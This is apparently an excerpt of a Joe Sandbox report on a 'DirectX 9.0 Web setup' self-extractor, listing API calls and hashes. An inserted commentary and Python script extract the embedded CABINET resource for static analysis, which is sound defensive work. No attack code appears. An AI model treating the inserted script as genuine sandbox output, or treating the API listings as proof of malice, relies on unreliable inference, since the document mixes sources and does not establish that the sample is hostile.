                                                                                                • Instruction ID: 4e04eab14abf842a0a3c42a681093732e4e7dc93d7d51bc9d8c979872b2e196d
                                                                                                • Opcode Fuzzy Hash: b07f304ec63bc814189986a0719c39693d795c7fab61f747b2dc9ea387807f31
                                                                                                • Instruction Fuzzy Hash: A971DB30A04209DBEB77DF68DA40BAD7BE9FB44304F11806AEBD1C61E5DB76A045CB58
                                                                                                APIs
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A48
                                                                                                  • Part of subcall function 01002A34: SizeofResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A4C
                                                                                                  • Part of subcall function 01002A34: FindResourceA.KERNEL32(00000000,00000000,0000000A), ref: 01002A68
                                                                                                  • Part of subcall function 01002A34: LoadResource.KERNEL32(00000000,00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A6C
                                                                                                  • Part of subcall function 01002A34: LockResource.KERNEL32(00000000,?,01004C70,TITLE,DirectX 9.0 Web setup,0000007F,?,00000000), ref: 01002A73
                                                                                                • FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 01002E89
                                                                                                • LoadResource.KERNEL32(00000000,00000000,?,010059A0), ref: 01002E92
                                                                                                • LockResource.KERNEL32(00000000,?,010059A0), ref: 01002E99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Resource$Find$LoadLock$Sizeof
                                                                                                • String ID: CABINET
                                                                                                • API String ID: 1933721802-1940454314
                                                                                                • Opcode ID: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction ID: f41c840c6a8244764c1701102c9fef1f774684e0028f7af970c8500be1e35917
                                                                                                • Opcode Fuzzy Hash: fee46d4037bcf492714a1928356b3615369b2f8f05e7677fcc6bc0c80cc05536
                                                                                                • Instruction Fuzzy Hash: 3EE08C71B42310ABE326ABB1AC1DB8B3A58AB19751F000416F286DA0C4CBBA84008791
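                                                                                                 The function above calls FindResourceA with the name CABINET and type 0000000A (RT_RCDATA) and then LoadResource/LockResource; together with the TITLE resource, the "DirectX 9.0 Web setup" caption and the C:\Users\user\AppData\Local\Temp\IXP000.TMP\ extraction directory seen in the neighbouring functions, that is the layout of a wextract/IExpress self-extracting package, so the CABINET resource is the embedded CAB an analyst wants to recover without running the sample. The Python below is an added example, not code from Joe Sandbox, from IExpress or from the analysed file: it walks a PE resource directory with the standard library only and returns that resource. All function names, the constants and the constructed PE produced by build_sample_pe / SAMPLE_PAYLOAD are this example's own and serve only to let it run offline; pass a real file path to run it against the sample.

```python
"""Recover the RT_RCDATA "CABINET" resource from a PE with the standard library only.
Added example (not from Joe Sandbox, IExpress or the sample); names are this example's own."""
import struct
import sys

RT_RCDATA = 10          # the 0xA passed to FindResourceA(hModule, "CABINET", 0xA)
_HIGH = 0x80000000      # set on an entry that points at a sub-directory or a name string
_MASK = 0x7FFFFFFF


def _sections(data):
    """Parse the headers; return (section table, RVA of the resource directory)."""
    if data[:2] != b"MZ":
        raise ValueError("not a PE: missing MZ")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE: missing PE signature")
    nsec = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    opt = e_lfanew + 24
    pe32 = struct.unpack_from("<H", data, opt)[0] == 0x10B
    rsrc_rva = struct.unpack_from("<I", data, opt + (96 if pe32 else 112) + 2 * 8)[0]  # DataDirectory[2]
    secs = []
    for i in range(nsec):
        vsize, va, rawsize, raw = struct.unpack_from("<IIII", data, opt + opt_size + i * 40 + 8)
        secs.append((va, vsize, raw, rawsize))
    return secs, rsrc_rva


def _rva_to_offset(secs, rva):
    for va, vsize, raw, rawsize in secs:
        if va <= rva < va + max(vsize, rawsize):
            return rva - va + raw
    raise ValueError("RVA 0x%x is not backed by any section" % rva)


def _walk(res, off=0, path=()):
    """Yield (path, data_rva, size) for each leaf of the resource tree rooted at res[off:]."""
    named, ids = struct.unpack_from("<HH", res, off + 12)
    for i in range(named + ids):
        name, child = struct.unpack_from("<II", res, off + 16 + 8 * i)
        if name & _HIGH:                                      # IMAGE_RESOURCE_DIR_STRING_U
            n = struct.unpack_from("<H", res, name & _MASK)[0]
            key = res[(name & _MASK) + 2:][:2 * n].decode("utf-16-le")
        else:
            key = name                                        # numeric type / name / language id
        if child & _HIGH:
            yield from _walk(res, child & _MASK, path + (key,))
        else:                                                 # IMAGE_RESOURCE_DATA_ENTRY
            rva, size = struct.unpack_from("<II", res, child)
            yield path + (key,), rva, size


def list_resources(data):
    secs, rsrc_rva = _sections(data)
    return list(_walk(data[_rva_to_offset(secs, rsrc_rva):])) if rsrc_rva else []


def extract_resource(data, rtype, name):
    """Bytes of resource (rtype, name), first language found, or None; names match case-insensitively."""
    secs, _ = _sections(data)
    for path, rva, size in list_resources(data):
        if len(path) >= 2 and path[0] == rtype and str(path[1]).upper() == str(name).upper():
            off = _rva_to_offset(secs, rva)
            return data[off:off + size]
    return None


def find_cabinet(data):
    """The embedded package: RT_RCDATA "CABINET", accepted only if it carries the MSCF CAB magic."""
    blob = extract_resource(data, RT_RCDATA, "CABINET")
    return blob if blob is not None and blob[:4] == b"MSCF" else None


SAMPLE_PAYLOAD = b"MSCF" + bytes(range(60))   # constructed stand-in for a real CAB body


def build_sample_pe(payload):
    """Constructed minimal PE32, one .rsrc section: RT_RCDATA -> "CABINET" -> lang 0x409 -> payload."""
    sec_rva, sec_raw = 0x1000, 0x200
    name = "CABINET".encode("utf-16-le")
    root = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", RT_RCDATA, _HIGH | 0x18)
    by_type = struct.pack("<IIHHHH", 0, 0, 0, 0, 1, 0) + struct.pack("<II", _HIGH | 0x58, _HIGH | 0x30)
    by_name = struct.pack("<IIHHHH", 0, 0, 0, 0, 0, 1) + struct.pack("<II", 0x409, 0x48)
    entry = struct.pack("<IIII", sec_rva + 0x68, len(payload), 0, 0)
    rsrc = root + by_type + by_name + entry + struct.pack("<H", len(name) // 2) + name + payload
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)                          # PE32 magic
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)                # section / file alignment
    struct.pack_into("<II", opt, 56, sec_rva + 0x1000, sec_raw)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)                            # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 2 * 8, sec_rva, len(rsrc))   # resource DataDirectory
    sec_hdr = (b".rsrc".ljust(8, b"\0") + struct.pack("<IIII", len(rsrc), sec_rva, len(rsrc), sec_raw)
               + b"\0" * 12 + struct.pack("<I", 0x40000040))
    return (dos + b"PE\0\0" + file_hdr + bytes(opt) + sec_hdr).ljust(sec_raw, b"\0") + rsrc


if __name__ == "__main__":
    pe = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe(SAMPLE_PAYLOAD)
    for path, rva, size in list_resources(pe):
        print(path, hex(rva), size)
    cab = find_cabinet(pe)
    print("CABINET payload:", None if cab is None else "%d bytes" % len(cab))
    if cab and len(sys.argv) > 1:
        open(sys.argv[1] + ".cab", "wb").write(cab)   # then unpack with cabextract or 7z
```

                                                                                                 Run without arguments it lists the one resource in the constructed PE and reports the payload size; run as `python extract_cabinet.py file.exe` it writes `file.exe.cab` next to the sample, which can then be unpacked with cabextract or 7z to obtain the dropped files without executing the stub. The MSCF check in find_cabinet is deliberate: a CABINET resource that is not a CAB means the stub has been modified or the payload is encoded, which is worth noticing rather than silently writing out.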
                                                                                                APIs
                                                                                                • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003A87
                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AAC
                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AB6
                                                                                                • LocalFree.KERNEL32(00000000,000004B5,00000000,00000000,00000010,00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AD4
                                                                                                  • Part of subcall function 010038CC: MessageBoxA.USER32(00000000,?,DirectX 9.0 Web setup,00000000), ref: 01003946
                                                                                                • lstrcpyA.KERNEL32(00000000,00000000,?,00000000,?,010049BE,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?), ref: 01003AE3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                 • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                 • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Local$Alloc$FreeMessagelstrcpylstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 3247521446-0
                                                                                                • Opcode ID: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction ID: be99e61ba3297938531ad782b9381de073ce5d9bd08aee7874bfad80a1221b46
                                                                                                • Opcode Fuzzy Hash: 1c252e24ed27c8a3c89f68d47637d6c558a56de84ee84e0859bd78fbfeca7fcd
                                                                                                • Instruction Fuzzy Hash: FB015EB1740305AFE3239F649C85E6A76ACFB55755F014425F3C5A6084D6BA88508B24
                                                                                                APIs
                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 010028B3
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028C5
                                                                                                • DispatchMessageA.USER32(?), ref: 010028DA
                                                                                                • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 010028E8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                • String ID:
                                                                                                • API String ID: 2776232527-0
                                                                                                • Opcode ID: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction ID: 9019c9b4a7aa9e97d921e157395a9add37c16d99774a71cba0f29cd9f7e0b4b7
                                                                                                • Opcode Fuzzy Hash: a56fe23e79c58ba78c4517e1b38a4719a0d3d39021dba4458620cccc97c02652
                                                                                                • Instruction Fuzzy Hash: E1012176D01219BABF218A999D48CEB7ABCEA85654F14016ABA41E2084E634D600C771
                                                                                                APIs
                                                                                                • GetCommandLineA.KERNEL32 ref: 01005A65
                                                                                                • GetStartupInfoA.KERNEL32(?), ref: 01005AA4
                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000,00000000,0000000A), ref: 01005ABF
                                                                                                • ExitProcess.KERNEL32 ref: 01005ACC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000002.00000002.3900862467.0000000001001000.00000020.00000001.01000000.00000005.sdmp, Offset: 01000000, based on PE: true
                                                                                                • Associated: 00000002.00000002.3900743063.0000000001000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3900957095.000000000100A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                • Associated: 00000002.00000002.3901069335.000000000100C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_2_2_1000000_UNK_.jbxd
                                                                                                Similarity
                                                                                                • API ID: CommandExitHandleInfoLineModuleProcessStartup
                                                                                                • String ID:
                                                                                                • API String ID: 2164999147-0
                                                                                                • Opcode ID: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction ID: 3b7e2d213fbb4e8bb4e10cefaec2fc303bbd8eb181140a99f14634f11779781f
                                                                                                • Opcode Fuzzy Hash: 2f495b8465459854e2a67ff318fe6398d5d3dc67db26c03b0204fa68f66db23f
                                                                                                • Instruction Fuzzy Hash: 07017C718043995AFB734BAC8C897FA7BE89F1B211F2404C5E9C1922C6C66884C28BA5